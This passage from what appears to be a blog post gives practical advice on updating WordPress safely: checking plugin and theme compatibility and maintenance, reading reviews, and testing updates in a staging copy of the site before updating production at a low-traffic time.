  1. Check your plugins and themes to see what version of WordPress they are compatible to
  2. Is your theme or plugin being actively maintained? Not sure? Contact the author/developer to see if it is compatible up to the latest, or up coming release candidate.
  3. Read reviews to see if anyone else is having issues. This may help you make decisions around how you upgrade, and how that plugin/theme fits into your future plans

The awesome thing about WordPress is there are a ton of alternatives for just about any functionality you want to plug in to your website. You shouldn’t loosen your security posture for functionality, there’s always a way!

3. Test in staging

Worst thing you can do, especially if you have a highly trafficked WordPress site is to not test the update. It’s real easy to miss something and next thing you know, the entire site may be affected.

So you have backed up your site, you have vetted your plugins and themes, everything is awesome. Next step is to set up a staging or development environment to test. Build a sub-domain with a replica of your production WordPress site, it is easy to do in most hosting environments, and since you have backups of your site, it’ll be painless to get that stuff into the staging site :)

Now you have free rain to update in staging, check everything, make sure that nothing breaks, and that you have a warm fuzzy that all is well. Once you’ve tested, pick a slow traffic time, and make the update.


None of this is rocket science of course, but in the end, we all forget steps sometimes.

Have anything to add? Are there any other crucial steps that you take to mitigate the risk of experiencing a bad WordPress update?

Let us know, we’d love to hear!